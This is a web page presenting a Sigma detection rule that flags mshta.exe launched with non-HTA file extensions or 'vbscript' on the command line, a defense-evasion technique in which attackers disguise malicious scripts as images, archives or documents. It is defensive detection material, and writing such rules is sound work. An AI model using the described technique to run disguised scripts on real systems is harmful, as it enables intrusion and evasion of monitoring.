MSHTA Execution with Suspicious File Extensions

calendar Jun 11, 2025 · attack.defense-evasion attack.t1140 attack.t1218.005 attack.execution attack.t1059.007 cve.2020-1599  ·
Share on: linkedin copy

Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content, such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.

Sigma rule (View on GitHub)

 1title: MSHTA Execution with Suspicious File Extensions
 2id: cc7abbd0-762b-41e3-8a26-57ad50d2eea3
 3status: test
 4description: |
 5    Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content,
 6    such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications
 7    containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and
 8    execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.    
 9references:
10    - http://blog.sevagas.com/?Hacking-around-HTA-files
11    - https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356
12    - https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script
13    - https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997
14    - https://twitter.com/mattifestation/status/1326228491302563846
15    - https://www.virustotal.com/gui/file/c1f27d9795a2eba630db8a043580a0761798f06370fb1317067805f8a845b00c
16author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems)
17date: 2019-02-22
18modified: 2025-05-12
19tags:
20    - attack.defense-evasion
21    - attack.t1140
22    - attack.t1218.005
23    - attack.execution
24    - attack.t1059.007
25    - cve.2020-1599
26logsource:
27    category: process_creation
28    product: windows
29detection:
30    selection_img:
31        - Image|endswith: '\mshta.exe'
32        - OriginalFileName: 'mshta.exe'
33    selection_cli:
34        CommandLine|contains:
35            - '.7z'
36            - '.avi'
37            - '.bat'
38            - '.bmp'
39            - '.conf'
40            - '.csv'
41            - '.dll'
42            - '.doc'
43            - '.gif'
44            - '.gz'
45            - '.ini'
46            - '.jpe'
47            - '.jpg'
48            - '.json'
49            - '.lnk'
50            - '.log'
51            - '.mkv'
52            - '.mp3'
53            - '.mp4'
54            - '.pdf'
55            - '.png'
56            - '.ppt'
57            - '.rar'
58            - '.rtf'
59            - '.svg'
60            - '.tar'
61            - '.tmp'
62            - '.txt'
63            - '.xls'
64            - '.xml'
65            - '.yaml'
66            - '.yml'
67            - '.zip'
68            - 'vbscript'
69            # - '.chm'  # could be prone to false positives
70            # - '.exe'
71    condition: all of selection_*
72falsepositives:
73    - False positives depend on scripts and administrative tools used in the monitored environment
74level: high

References

Related rules

to-top